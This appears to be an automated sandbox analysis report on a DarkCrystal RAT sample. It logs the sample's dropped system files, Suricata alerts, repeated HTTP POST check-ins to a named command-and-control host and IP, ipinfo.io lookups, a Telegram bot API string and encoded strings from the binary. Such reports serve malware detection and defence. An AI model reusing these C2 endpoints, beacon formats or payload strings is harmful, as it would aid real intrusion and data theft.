Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\e589e10572e94b	Jump to behavior

Source: unknown

HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: k1iZHyRK6K.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: 7C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.pdb source: k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000003042000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49733 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49743 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49744 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49828 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49875 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49865 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49903 -> 37.44.238.250:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io

Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 37.44.238.250 37.44.238.250

Source: Joe Sandbox View

ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipinfo.io

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 34.117.59.81:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 34.117.59.81:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49734

Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: 452132cm.n9shteam2.top

Source: unknown

HTTP traffic detected: POST /Processdownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 452132cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://452132cm.n9shteam2.top
Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://452132cm.n9shteam2.top/
Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://452132cm.n9shteam2.top/Processdownloads.php
Source: k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000003122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io
Source: k1iZHyRK6K.exe, 00000000.00000002.1704577020.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.00000000027AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: k1iZHyRK6K.exe, 00000000.00000002.1704433455.00000000027E2000.00000002.00000001.01000000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002902000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002731000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002381000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002528000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.000000000253E000.00000004.00000800.00020000.00000000.sdmp, YSUUeens.log.30.dr, fzpjyagV.log.35.dr, GZjfleQD.log.0.dr, iLMKqBdM.log.47.dr	String found in binary or memory: https://api.telegram.org/bot
Source: k1iZHyRK6K.exe, 00000000.00000002.1704577020.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000003106000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io(
Source: k1iZHyRK6K.exe, 00000000.00000002.1704577020.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000003106000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 00000000.00000002.1704433455.00000000027E2000.00000002.00000001.01000000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002902000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002731000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002381000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002528000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.000000000253E000.00000004.00000800.00020000.00000000.sdmp, YSUUeens.log.30.dr, fzpjyagV.log.35.dr, GZjfleQD.log.0.dr, iLMKqBdM.log.47.dr	String found in binary or memory: https://ipinfo.io/country
Source: k1iZHyRK6K.exe, 00000000.00000002.1704577020.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000003106000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 00000000.00000002.1704433455.00000000027E2000.00000002.00000001.01000000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002902000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002731000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002381000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002528000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.000000000253E000.00000004.00000800.00020000.00000000.sdmp, YSUUeens.log.30.dr, fzpjyagV.log.35.dr, GZjfleQD.log.0.dr, iLMKqBdM.log.47.dr	String found in binary or memory: https://ipinfo.io/ip

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

.NET source code contains very large strings

Source: k1iZHyRK6K.exe, Class16.cs

Long String: Length: 179344

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B878028	0_2_00007FFD9B878028
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B87C425	0_2_00007FFD9B87C425
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B87C350	0_2_00007FFD9B87C350
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B878E70	0_2_00007FFD9B878E70
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B871222	0_2_00007FFD9B871222
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B8793A1	0_2_00007FFD9B8793A1
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B878E7F	0_2_00007FFD9B878E7F
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B8848EE	0_2_00007FFD9B8848EE
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B9F0B12	0_2_00007FFD9B9F0B12
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B9E195A	0_2_00007FFD9B9E195A
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B9F33AA	0_2_00007FFD9B9F33AA
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B9F331A	0_2_00007FFD9B9F331A
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 0_2_00007FFD9B9EFD66	0_2_00007FFD9B9EFD66
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 22_2_00007FFD9B8A1222	22_2_00007FFD9B8A1222
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 23_2_00007FFD9B891222	23_2_00007FFD9B891222
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 24_2_00007FFD9B891222	24_2_00007FFD9B891222
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 25_2_00007FFD9B891222	25_2_00007FFD9B891222
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA8028	30_2_00007FFD9BAA8028
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAAC425	30_2_00007FFD9BAAC425
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAAC350	30_2_00007FFD9BAAC350
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA8E70	30_2_00007FFD9BAA8E70
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA1222	30_2_00007FFD9BAA1222
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAA8E7F	30_2_00007FFD9BAA8E7F
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 30_2_00007FFD9BAB48EE	30_2_00007FFD9BAB48EE
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB8028	35_2_00007FFD9BAB8028
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BABC425	35_2_00007FFD9BABC425
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BABC350	35_2_00007FFD9BABC350
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB8E70	35_2_00007FFD9BAB8E70
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB1222	35_2_00007FFD9BAB1222
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB93A1	35_2_00007FFD9BAB93A1
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAB8E7F	35_2_00007FFD9BAB8E7F
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BAC48EE	35_2_00007FFD9BAC48EE
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BC33E82	35_2_00007FFD9BC33E82
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BC2195A	35_2_00007FFD9BC2195A
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BC330D6	35_2_00007FFD9BC330D6
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 35_2_00007FFD9BC3A08E	35_2_00007FFD9BC3A08E
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 36_2_00007FFD9BAA1222	36_2_00007FFD9BAA1222
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 42_2_00007FFD9BAB1222	42_2_00007FFD9BAB1222
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 43_2_00007FFD9BA91222	43_2_00007FFD9BA91222
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Code function: 46_2_00007FFD9BA91222	46_2_00007FFD9BA91222
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 47_2_00007FFD9BAA8028	47_2_00007FFD9BAA8028
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 47_2_00007FFD9BAA1222	47_2_00007FFD9BAA1222
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 47_2_00007FFD9BAA8E7F	47_2_00007FFD9BAA8E7F
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 47_2_00007FFD9BAAC425	47_2_00007FFD9BAAC425
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 47_2_00007FFD9BAAC350	47_2_00007FFD9BAAC350
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Code function: 47_2_00007FFD9BC1195A	47_2_00007FFD9BC1195A

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\CdzqKGoc.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97

Source: k1iZHyRK6K.exe, 00000000.00000002.1709544106.000000001BBAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs k1iZHyRK6K.exe
Source: k1iZHyRK6K.exe, 00000000.00000002.1709544106.000000001BB80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs k1iZHyRK6K.exe
Source: k1iZHyRK6K.exe, 00000000.00000002.1704433455.00000000027E2000.00000002.00000001.01000000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs k1iZHyRK6K.exe
Source: k1iZHyRK6K.exe, 00000000.00000000.1640485684.0000000000662000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs k1iZHyRK6K.exe
Source: k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002381000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs k1iZHyRK6K.exe
Source: k1iZHyRK6K.exe, 0000002F.00000002.2045140657.000000001ADC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Ex vs k1iZHyRK6K.exe
Source: k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002528000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs k1iZHyRK6K.exe
Source: k1iZHyRK6K.exe, 0000002F.00000002.2030593494.000000000253E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs k1iZHyRK6K.exe
Source: k1iZHyRK6K.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs k1iZHyRK6K.exe

Source: k1iZHyRK6K.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: k1iZHyRK6K.exe, Stream5.cs	Cryptographic APIs: 'TransformBlock'
Source: k1iZHyRK6K.exe, Stream5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: k1iZHyRK6K.exe, Stream5.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: k1iZHyRK6K.exe, qJk.cs	Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: k1iZHyRK6K.exe, sz3.cs	Base64 encoded string: 'q/w3FaDLcTKqsLUXMOXk9/iE6b5Eskgj0NdYlHN8tVhNi8IFl7Kd+ZKcRZpyNEVq4YrAQGSMphwvzKhrriAGxr21FbzPiQzhHAeEoA4YZQpr2L6ttW1O//HBpeeea8929iyelt43+JYgJd9lw2p3IivBTz+/5jZ8E1wxIlZDgcgLWLy//j0x9J0bAcHf54zr5HQprOT3xsWa4zQ+LBgA2RH4Kgg/rV7VKaIaGiXsBCSaWLjO2vKkzcl6eaZbFIN7KANYR/UO6NwL1vmz/MzdZ3xeT5z/HxQ8QpwGtclXpKHhselFhLSpevgBtM2PxhyhU1DKLxVE275UytV7tyCSzRBkx2+lxYMCA9mslSlyvbOW+SpfpvlvsS7DvnrhZCcJyZZD4LrduqYSagD39JdZmHvf4nNhW4gJODSQb/vIj7kni3RIvBWqt70lXlZAoWeWgWy6nJyTbD/+67CH/GjUs7M8MSddITKiVNy8GRrPk0Uop7lV/inpxli76dE1zFbkHwRsUAZAp5KMKae5irpbi/2p1K9jDzoNgLjBCrdKcM6u4PKggFCpr9kAwWsHu8CorXmCg0qSUJqC9J4DbgrHZYA4FuysSR3Gu0FfhWmlKaVzLSbPAl23gtM/xOMtQYaOFXnGAOqW13nP/pAUfWkIeiosRcoKR/6aYj7AytXtr/WMWehfBcTH0EwS7R4SwUTDRGzIUxN0daIp6z6ifzD3725ywfqLPWwWEnhJHzTxBXgGLgzLvzFAQs9PGaWirK6y3jsDbIp1O4i3s13Qkp3gWm4I83IfUvYwymnzdQQFIdrOf9SZcpWGTLZvyWYirMvTLzasV1i1hvC1N4HMIc6lTw3YJNbTR/gLSqDnqrIYmw1qKBLVTflVgkS6f4CDqpu8vaqSVKEl0vE+k5q1RoZ0s+LuYtn7WJEXZPURK1ZzMS4HwGMvMBWVDi+wZG7AEerVwbVe3Ftk2NOwSaJrUdqC2g=='
Source: k1iZHyRK6K.exe, Class17.cs	Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
